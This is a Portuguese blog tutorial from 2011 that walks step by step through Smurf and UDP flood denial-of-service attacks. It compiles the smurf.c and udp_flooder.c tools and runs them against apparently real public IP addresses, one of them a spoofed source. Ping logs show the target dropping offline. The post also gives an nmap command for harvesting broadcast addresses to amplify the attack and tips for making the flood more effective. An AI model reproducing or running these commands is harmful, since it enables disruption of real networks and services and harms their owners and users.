Pages

quinta-feira, 3 de março de 2011

1
Tutorial - Realizando ataque SMURF e UDP Flood ( antes que alguém pergunte isso e pra LinuX )

Tutorial - Realizando ataque SMURF e UDP Flood


|=====================================|
| Introdução |
|=====================================|

Oi, eu sou Dreamexplo e estou fazendo este tutorial para demonstrar como realizar um ataque SMURF e UDP Flood.




|=====================================|
| Materiais |
|=====================================|

Para prosseguirmos precisamos de 3 coisas:
---> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de Ips AQUI )

---> smurf.c ( AQUI )

---> udp_flooder.c ( AQUI )



|=====================================|
| Primeiros passos |
|=====================================|

Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#

Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#


|=====================================|
| Preparando o ataque com Smurf |
|=====================================|

Para continuar daqui pra frente você precisa se tornar root no konsole.

Executando o smurf:
# ./smurf

usage: ./smurf

target = endereço para atacar
bcast file = arquivo com os endereços de broadcast
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102) O comando que irei utilizar para atacar sera este abaixo: # ./smurf 200.140.161.201 broadcast.txt 0 0 1024 |==========================| | Atacando o alvo | |==========================| Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”: # ping 200.140.161.201 PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data. 64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms 64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms 64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms 64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms 64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms 64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms ^C --- 200.140.161.201 ping statistics --- 6 packets transmitted, 6 received, 0% packet loss, time 5006ms Esta “ON”, agora vou executar o comando para atacar: # ./smurf 200.140.161.201 broadcast.txt 0 0 1024 smurf.c v4.0 by TFreak Flooding 200.140.161.201 (. = 25 outgoing packets) .................................................. .................................................. ................................ .................................................. .................................................. ................................ .................................................. .................................................. ................................ .................................................. .................................................. ................................ Depois de um certo tempo, vamos pingar o alvo novamente para ver se ele continua “ON”: # ping 200.140.161.201 PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data. 64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms 64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms 64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms 64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms 64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms --- 200.140.161.201 ping statistics --- 28 packets transmitted, 5 received, 82% packet loss, time 27086ms # ping 200.140.161.201 PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data. --- 200.140.161.201 ping statistics --- 5 packets transmitted, 0 received, 100% packet loss, time 3999ms Pronto, o alvo esta “OFF”. (DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque. Agora vamos utilizar o udp_flooder. Para executa-lo: # ./udp_flooder [=] + ===========[####]============ + [=] *** Emperial Flooder[UDP] *** XxX VIPER CORP GROUP XxX <-> Underground Max <->
[=] + ==========[####]============ + [=]

Uso: ./udp_flooder



O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

(Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas)



Vamos “pingar” o host alvo:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms

--- 200.140.161.201 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5008ms




Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

--- Estatisticas e infos do ataque -------------

Total de bytes enviados: [31000000]
----------------------------------------


Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

--- 200.140.161.201 ping statistics ---
15 packets transmitted, 0 received, 100% packet loss, time 14112ms

Como podem ver o alvo ficou “OFF”.

Obs: Da pra usar o NMAP pra pegar endereços Ips para broadcast, usando este comando:
# nmap -sP -iR 5000 > Smurfable.txt

Tem tambem a video aula que fiz sobre este assunto, segue o link a baixo:
AQUI

Espero que tenham gostado.


Autor: Dreamexplo

Tutorial 100% Dreamexplo

1 comentários:

iphone application development disse...

Providing tutorials on internet about technology is a best way to lead in internet world. It is a great features which can provide a wide knowledge also.

 
ST Informática | © 2010 by DheTemplate.com | Supported by Promotions And Coupons Shopping & WordPress Theme 2 Blog